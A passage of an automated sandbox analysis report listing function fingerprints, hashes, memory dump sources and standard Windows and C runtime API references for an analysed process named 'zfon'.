                                                                                                 • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: Initstd::ios_base::_$AddstdExceptionThrowsetvbufstd::ios_base::failure::failurestd::locale::_
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 692481045-1866435925
                                                                                                • Opcode ID: fd2f3828b474fe88a08b624c1155f3347718e21b58a1bf8b771f14d77974cb8c
                                                                                                • Instruction ID: 0643a3c8f734ec3be961e70fa18f13d63121746974d49c064a78751b23d6edb5
                                                                                                • Opcode Fuzzy Hash: fd2f3828b474fe88a08b624c1155f3347718e21b58a1bf8b771f14d77974cb8c
                                                                                                • Instruction Fuzzy Hash: 30414A32A18B86D6EF548F29D4413A923A0FB54B88F544135CB4C4B759EF3DD6A5CB80
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                 • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionThrow$std::ios_base::failure::failure
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 1099746521-1866435925
                                                                                                • Opcode ID: 2623c180e2649d673c19943a1c372692043f06206a25c303505745926fdd538a
                                                                                                • Instruction ID: 52a0e4b738551af5fa628c038aa480601b148bb19e6cb8f33c916f66e1d48503
                                                                                                • Opcode Fuzzy Hash: 2623c180e2649d673c19943a1c372692043f06206a25c303505745926fdd538a
                                                                                                • Instruction Fuzzy Hash: 3B21F461E1D9CBA2EE149F0CD8515F92320EF907C8F980075DB2E46691EF2DE647C750
                                                                                                APIs
                                                                                                • memcmp.VCRUNTIME140 ref: 00007FF7F96E9F9A
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E9FC9
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E9FD9
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E9FE9
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96E9FF6
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96EA099
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96EA0A9
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96EA0B9
                                                                                                • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F96EA0C6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                 • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$memcmp
                                                                                                • String ID:
                                                                                                • API String ID: 807481086-0
                                                                                                • Opcode ID: 6694e026aaf3a7002ff2ed4c44ca68141b0bbbe39b4cc9ae27ff4adb9968087a
                                                                                                • Instruction ID: fa702d49b1434d1fcda619d7ff455922fba060d5442205cfcbed4b976a4878ca
                                                                                                • Opcode Fuzzy Hash: 6694e026aaf3a7002ff2ed4c44ca68141b0bbbe39b4cc9ae27ff4adb9968087a
                                                                                                • Instruction Fuzzy Hash: 8F61EF22908B4694FB54BF15E848369A3B2EB85BE4F840135DB6D037D9CF7DE881C3A5
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF7F96E2470: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F96E22DB), ref: 00007FF7F96E24CB
                                                                                                  • Part of subcall function 00007FF7F96E2470: memcpy.VCRUNTIME140(?,?,?,00007FF7F96E22DB), ref: 00007FF7F96E24E2
                                                                                                  • Part of subcall function 00007FF7F96E2470: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FF7F96E22DB), ref: 00007FF7F96E24FA
                                                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F96EBB6F
                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F96EBB8C
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F96EBBAF
                                                                                                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F96EBBE9
                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F96EBBFF
                                                                                                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F96EBC2C
                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F96EBC46
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00007FF7F96EBC60
                                                                                                • memmove.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-8000000000000000,?,00000000), ref: 00007FF7F96EBC7E
                                                                                                • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00000000,?,-8000000000000000,?,00000000), ref: 00007FF7F96EBC93
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2529502672.00007FF7F96E1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF7F96E0000, based on PE: true
                                                                                                 • Associated: 00000005.00000002.2529472030.00007FF7F96E0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529622789.00007FF7F97CA000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529622789.00007FF7F98D5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529823423.00007FF7F9941000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529844483.00007FF7F9942000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529872524.00007FF7F9953000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529894361.00007FF7F9955000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                 • Associated: 00000005.00000002.2529922234.00007FF7F9969000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff7f96e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: memcpy$freememmove$malloc
                                                                                                • String ID:
                                                                                                • API String ID: 4013446061-0
                                                                                                • Opcode ID: e089aead12471174f67b217228ee1f711afbbab99f3f5fe2c7168f9a7e92059a
                                                                                                • Instruction ID: 7a3c2f78a030d08d517449a9973a8cc535acafb0d66d4e1992eb1e9063884e0a
                                                                                                • Opcode Fuzzy Hash: e089aead12471174f67b217228ee1f711afbbab99f3f5fe2c7168f9a7e92059a
                                                                                                • Instruction Fuzzy Hash: E9518166609B8141DB11EF16E94436AE771EB89FE4F940235EE6E07BDDEE3DD0408350
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                 • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 2003779279-1866435925
                                                                                                • Opcode ID: 08befa980dfea9c0ef3bf137efc51fc0e2de0c9f28397007ab18f16809292510
                                                                                                • Instruction ID: eb068f9b8adea2ecc317347446103d948f618bac2d3cb969a6e038803b15bfa3
                                                                                                • Opcode Fuzzy Hash: 08befa980dfea9c0ef3bf137efc51fc0e2de0c9f28397007ab18f16809292510
                                                                                                • Instruction Fuzzy Hash: F1715876A08A8695EB649F1DD4913BC3761FB80BC4F548136CB1E577A4EF2DE846D300
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                 • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 2003779279-1866435925
                                                                                                • Opcode ID: 7650bd997bf7dffc81ca24ad573e1d6ea6f87f8d0221c566a3e0038d77b00579
                                                                                                • Instruction ID: cbb8a769a19f2f91afbaefd2d1082af35d0989d854f7d529d08aea0d9c4de274
                                                                                                • Opcode Fuzzy Hash: 7650bd997bf7dffc81ca24ad573e1d6ea6f87f8d0221c566a3e0038d77b00579
                                                                                                • Instruction Fuzzy Hash: 7B714672A08A8691EB149F1DD4903BC37A0EB84BC4F558136DB5E937E4EF2DE886D300
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                 • Associated: 00000005.00000002.2549750292.00007FF8BFB50000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                 • Associated: 00000005.00000002.2549976829.00007FF8BFB63000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                 • Associated: 00000005.00000002.2550400824.00007FF8BFB68000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                 • Associated: 00000005.00000002.2550885347.00007FF8BFB69000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8bfb50000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
                                                                                                • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                                                                • API String ID: 1852475696-928371585
                                                                                                • Opcode ID: 4ef8ad2c729168d00ef0645f383a1968f42c4eb1f6a8b3717fe5ffb80b324514
                                                                                                • Instruction ID: 3acb0bf8bf7f44c560cb9864c3f68461de8b158a7736af1c417171afaa931eb0
                                                                                                • Opcode Fuzzy Hash: 4ef8ad2c729168d00ef0645f383a1968f42c4eb1f6a8b3717fe5ffb80b324514
                                                                                                • Instruction Fuzzy Hash: E851A362B29A46A2EE20CB98E8A16B97362FF44BC4F40453ADB4D47755DF3CF505C700
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                 • Associated: 00000005.00000002.2548142197.00007FF8B90E0000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548344491.00007FF8B9132000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548447393.00007FF8B916F000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548531486.00007FF8B9170000.00000008.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2548716958.00007FF8B9171000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2549289518.00007FF8B9173000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                 • Associated: 00000005.00000002.2549289518.00007FF8B9179000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_5_2_7ff8b90e0000_zfon.jbxd
                                                                                                Similarity
                                                                                                • API ID: ExceptionThrowstd::ios_base::failure::failure
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 2003779279-1866435925
                                                                                                • Opcode ID: 8de342f0291e80d733e627eaf939c61c9f2c4bc02dc7a8bd2179287c94fe2617
                                                                                                • Instruction ID: 599bdaf7118dbf2e656d2dbcab2e3170590cb20c28047e9c78a5ba2a98ad8eee
                                                                                                • Opcode Fuzzy Hash: 8de342f0291e80d733e627eaf939c61c9f2c4bc02dc7a8bd2179287c94fe2617
                                                                                                • Instruction Fuzzy Hash: 53517E62A08A86D1EF549F1DD4903A86760EB84BD9F548235DB2E837E5DF3CE986C300
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74B8
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C0
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C9
                                                                                                  • Part of subcall function 00007FF8B90E74A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74E5
                                                                                                • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B9105723
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B910575B
                                                                                                • _Getvals.LIBCPMT ref: 00007FF8B9105794
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8B910586E
                                                                                                  • Part of subcall function 00007FF8B9116410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8B9116419
                                                                                                  • Part of subcall function 00007FF8B9116410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF8B912CAF9,?,?,00000000,00007FF8B90EC4D0), ref: 00007FF8B911642A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: Concurrency::cancel_current_taskExceptionGetvalsThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvstd::bad_alloc::bad_alloc
                                                                                                • String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
                                                                                                • API String ID: 801482897-3573081731
                                                                                                • Opcode ID: 9c08d5fc2ba6d1f9c895b19a1ef2ef9da669aab50d1ee5f16d3dedc8da72be6f
                                                                                                • Instruction ID: 2b81017a8ce04bc590bbebc2749971fe06f20d7fdc3f357101a72a2c35fdafed
                                                                                                • Opcode Fuzzy Hash: 9c08d5fc2ba6d1f9c895b19a1ef2ef9da669aab50d1ee5f16d3dedc8da72be6f
                                                                                                • Instruction Fuzzy Hash: 8051CE36A08BC186EB24CF2A949047D7BA4FB45BD0B544276CFA9437A5DF3EE485E700
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74B8
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C0
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C9
                                                                                                  • Part of subcall function 00007FF8B90E74A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74E5
                                                                                                • localeconv.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B91058CB
                                                                                                • calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B9105903
                                                                                                • _Getvals.LIBCPMT ref: 00007FF8B910593C
                                                                                                • Concurrency::cancel_current_task.LIBCPMT ref: 00007FF8B9105A16
                                                                                                  • Part of subcall function 00007FF8B9116410: std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8B9116419
                                                                                                  • Part of subcall function 00007FF8B9116410: _CxxThrowException.VCRUNTIME140(?,?,?,?,?,?,?,?,00007FF8B912CAF9,?,?,00000000,00007FF8B90EC4D0), ref: 00007FF8B911642A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: Concurrency::cancel_current_taskExceptionGetvalsThrow___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_funccalloclocaleconvstd::bad_alloc::bad_alloc
                                                                                                • String ID: $+xv$$+xv$+v$x+v$xv$+xv+$xv$+x+$vx+$vx$v+x+$vx$+vx+v $+v $v $+v +$v $++$ v+$ v$ v++$ v$+ v+xv$+ v$v$ +v+ $v$ ++x$v+ $v$v ++ $v$ +v
                                                                                                • API String ID: 801482897-3573081731
                                                                                                • Opcode ID: 08f4393cbb9286a77c8465830587d0892ef895849c8ce4b697314d7c6ad679fd
                                                                                                • Instruction ID: 03cda1569cfb5d8950127a11177700921ef50311ae1a07321e4468042d0cbfaf
                                                                                                • Opcode Fuzzy Hash: 08f4393cbb9286a77c8465830587d0892ef895849c8ce4b697314d7c6ad679fd
                                                                                                • Instruction Fuzzy Hash: AD51C132A08BC186E724CF29949056D7BB5FB45BE4B141275CFA9437A4DF3EE445E700
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF8BFAD379F,?,?,00000000,00007FF8BFAD35D0,?,?,?,?,00007FF8BFAD334D), ref: 00007FF8BFAD3665
                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF8BFAD379F,?,?,00000000,00007FF8BFAD35D0,?,?,?,?,00007FF8BFAD334D), ref: 00007FF8BFAD3673
                                                                                                • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8BFAD379F,?,?,00000000,00007FF8BFAD35D0,?,?,?,?,00007FF8BFAD334D), ref: 00007FF8BFAD368C
                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF8BFAD379F,?,?,00000000,00007FF8BFAD35D0,?,?,?,?,00007FF8BFAD334D), ref: 00007FF8BFAD369E
                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF8BFAD379F,?,?,00000000,00007FF8BFAD35D0,?,?,?,?,00007FF8BFAD334D), ref: 00007FF8BFAD370C
                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF8BFAD379F,?,?,00000000,00007FF8BFAD35D0,?,?,?,?,00007FF8BFAD334D), ref: 00007FF8BFAD3718
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549530455.00007FF8BFAD1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8BFAD0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                                                                • String ID: api-ms-
                                                                                                • API String ID: 916704608-2084034818
                                                                                                • Opcode ID: 8d2fd0d93c7eb14211fa12b3fc953288da202effed1889c61ef573fe6e8128a2
                                                                                                • Instruction ID: 41eb83eb9a6851515688a13f28a1b8bcb92bb2044d5e4c08eaab129c77d63d7a
                                                                                                • Opcode Fuzzy Hash: 8d2fd0d93c7eb14211fa12b3fc953288da202effed1889c61ef573fe6e8128a2
                                                                                                • Instruction Fuzzy Hash: 6731E729B1AB4197FE39AB9AA80217A23A4BF44BE8F496534DF1D073C4DF3CE0558700
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF8BFB571A3,?,?,00000000,00007FF8BFB56FD4,?,?,?,?,00007FF8BFB56D11), ref: 00007FF8BFB57069
                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF8BFB571A3,?,?,00000000,00007FF8BFB56FD4,?,?,?,?,00007FF8BFB56D11), ref: 00007FF8BFB57077
                                                                                                • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF8BFB571A3,?,?,00000000,00007FF8BFB56FD4,?,?,?,?,00007FF8BFB56D11), ref: 00007FF8BFB57090
                                                                                                • LoadLibraryExW.KERNEL32(?,?,?,00007FF8BFB571A3,?,?,00000000,00007FF8BFB56FD4,?,?,?,?,00007FF8BFB56D11), ref: 00007FF8BFB570A2
                                                                                                • FreeLibrary.KERNEL32(?,?,?,00007FF8BFB571A3,?,?,00000000,00007FF8BFB56FD4,?,?,?,?,00007FF8BFB56D11), ref: 00007FF8BFB57110
                                                                                                • GetProcAddress.KERNEL32(?,?,?,00007FF8BFB571A3,?,?,00000000,00007FF8BFB56FD4,?,?,?,?,00007FF8BFB56D11), ref: 00007FF8BFB5711C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2549874919.00007FF8BFB51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                                                                • String ID: api-ms-
                                                                                                • API String ID: 916704608-2084034818
                                                                                                • Opcode ID: 76e9ed00015fa7378e2762435fe1c6674923b12dca3248f544122840abba5d3b
                                                                                                • Instruction ID: bf360aa0ad272c1e23d9479e674a4266aa366a460bdbea350a4e4091103d3c8f
                                                                                                • Opcode Fuzzy Hash: 76e9ed00015fa7378e2762435fe1c6674923b12dca3248f544122840abba5d3b
                                                                                                • Instruction Fuzzy Hash: 82316122B1A746A1EE119B8A982497573D4BF44BE0F6D4535DF1D87354EF3CF5488300
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000005.00000002.2548203857.00007FF8B90E1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B90E0000, based on PE: true
                                                                                                Similarity
                                                                                                • API ID: Initstd::ios_base::_$AddstdExceptionThrowstd::ios_base::failure::failurestd::locale::_
                                                                                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                • API String ID: 792165947-1866435925
                                                                                                • Opcode ID: 5a961f8f7a396de3a89a0a91937ff84da1abf775fff624eb7f976a44ec027974
                                                                                                • Instruction ID: 88763665f41e69cc2083e789d53815700020881681ab896e0bd8e6b09b439e4e
                                                                                                • Opcode Fuzzy Hash: 5a961f8f7a396de3a89a0a91937ff84da1abf775fff624eb7f976a44ec027974
                                                                                                • Instruction Fuzzy Hash: D0218F62A18ACA92EE149F2DE5513A967A0FB547C0F444031E75D47B96DF3CE5A2C700
                                                                                                APIs
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74B8
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C0
                                                                                                  • Part of subcall function 00007FF8B90E74A0: ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74C9
                                                                                                  • Part of subcall function 00007FF8B90E74A0: __pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FF8B90E74E5
                                                                                                • _W_Getdays.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B90FC3EE
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B90FC40B
                                                                                                • _W_Getmonths.API-MS-WIN-CRT-TIME-L1-1-0 ref: 00007FF8B90FC42B
                                                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF8B90FC448
                                                                                                  • Part of subcall function 00007FF8B90EB710: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF8B90FC445), ref: 00007FF8B90EB739
                                                                                                  • Part of subcall function 00007FF8B90EB710: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00000000,00007FF8B90FC445), ref: 00007FF8B90EB768
                                                                                                  • Part of subcall function 00007FF8B90EB710: memcpy.VCRUNTIME140(?,?,00000000,00007FF8B90FC445), ref: 00007FF8B90EB77F
                                                                                                Strings
                                                                                                • :Jan:January:Feb:February:Mar:March:Apr:April:May:May:Jun:June:Jul:July:Aug:August:Sep:September:Oct:October:Nov:November:Dec:Dece, xrefs: 00007FF8B90FC453
                                                                                                • :AM:am:PM:pm, xrefs: 00007FF8B90FC464
                                                                                                • :Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday, xrefs: 00007FF8B90FC416
                                                                                                Memory Dump Source
